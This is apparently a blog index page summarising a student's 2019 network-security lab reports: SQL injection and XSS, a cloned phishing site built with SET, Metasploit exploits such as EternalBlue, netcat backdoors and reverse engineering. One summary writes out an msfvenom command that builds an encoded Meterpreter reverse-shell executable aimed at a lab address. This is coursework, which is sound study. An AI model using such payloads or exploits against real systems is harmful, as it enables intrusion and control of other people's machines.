摘要:1.实践过程记录 1.字符串型注入。 2.整数型注入 3.注入语句查看其他内容 4.xss是一种漏洞,这种漏洞允许用户输入脚本并且浏览器提交的时候不加编码。这种东西是最为流行并且有害的web应用的问题。web应用上有一些“特权功能”是通过JavaScript来连接的,如果这种跳转机制没有被正确地保护 阅读全文
posted @ 2019-05-26 20:25 李勖 阅读(49) 评论(0) 推荐(0) 编辑
摘要:1.实践内容 (1).Web前端HTML 能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML。 使用service apache2 start启动apache服务。 表单:即把前端数据传送到后台的东西。 get:输入参数会显示在浏览器网址那一栏 阅读全文
posted @ 2019-05-19 11:01 李勖 阅读(67) 评论(0) 推荐(0) 编辑
摘要:1.实践目标 本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。 2.实践内容 (1)简单应用SET工具建立冒名网站 (1分) apachectl start开启服务 server apache2 restart重启apache2侦听服务 apache服务测试 可正常,无问 阅读全文
posted @ 2019-05-05 17:24 李勖 阅读(65) 评论(0) 推荐(0) 编辑
摘要:1.实践目标 掌握信息搜集的最基础技能与常用工具的使用方法。 2.实践内容 (1)各种搜索技巧的应用 https://www.exploit-db.com/收集各种应用软件的漏洞,如tomcat服务器存在的漏洞和版本 shodan,对物联网设备(如摄像头通过弱口令等其他方式)以及其他很多东西进行在线 阅读全文
posted @ 2019-05-01 17:14 李勖 阅读(66) 评论(0) 推荐(0) 编辑
摘要:本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 总计:主动:ms17_010永恒之蓝(成功); 浏览器:office_word_hta(成功); 客户端:ms10_046_shortcut_icon_dllloader(成功); ms15_020_s 阅读全文
posted @ 2019-04-20 20:33 李勖 阅读(158) 评论(2) 推荐(0) 编辑
摘要:1.系统运行监控 (1)使用如计划任务,每隔一分钟记录自己的电脑有哪些程序在联网,连接的外部IP是哪里。运行一段时间并分析该文件,综述一下分析结果。目标就是找出所有连网的程序,连了哪里,大约干了什么(不抓包的情况下只能猜),你觉得它这么干合适不。如果想进一步分析的,可以有针对性的抓包。 1.使用sc 阅读全文
posted @ 2019-04-07 17:29 李勖 阅读(97) 评论(0) 推荐(0) 编辑
摘要:1. 实践内容 1.1 正确使用msf编码器 使用 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b ‘\x00’ LHOST=192.168.136.135 LPORT=5222 -f exe > c 阅读全文
posted @ 2019-03-31 16:04 李勖 阅读(107) 评论(0) 推荐(0) 编辑
摘要:Exp2 后门原理与实践 实验环境 win7ip地址为: 192.168.136.130 kali.ip地址为: 192.168.136.129 两台虚拟机可以ping通 实验步骤 1,使用netcat获取主机操作Shell,cron启动 (1)使用WIN7进行监听,kali反弹连接。WIN7中输入 阅读全文
posted @ 2019-03-24 14:55 李勖 阅读(392) 评论(0) 推荐(0) 编辑
摘要:Exp1 PC平台逆向破解 1,掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 NOP:空指令,作用就是直接跳到下一指令。机器码为:90。 JNE:判断0标志位,不等于0跳转。机器码为:75。 JE:判断0标志位,等于0跳转。机器码为:74。 JMP:无条件跳转。机器码为:eb。 阅读全文
posted @ 2019-03-16 19:50 李勖 阅读(73) 评论(0) 推荐(0) 编辑
摘要:Exp0 Kali安装 安装时没进行截图,只有最终结果。包含共享文件夹,拼音输入法,网络也能正常使用。 。 遇到的问题 安装时,安装程序提示找不到网卡。 我猜测应该是我的主机正在使用,程序无法检测到,因此直接跳过,继续安装,结束后无明显问题,正常上网。 其他问题如键盘鼠标动不了,只要安装时选择一个其 阅读全文
posted @ 2019-03-03 14:11 李勖 阅读(45) 评论(0) 推荐(0) 编辑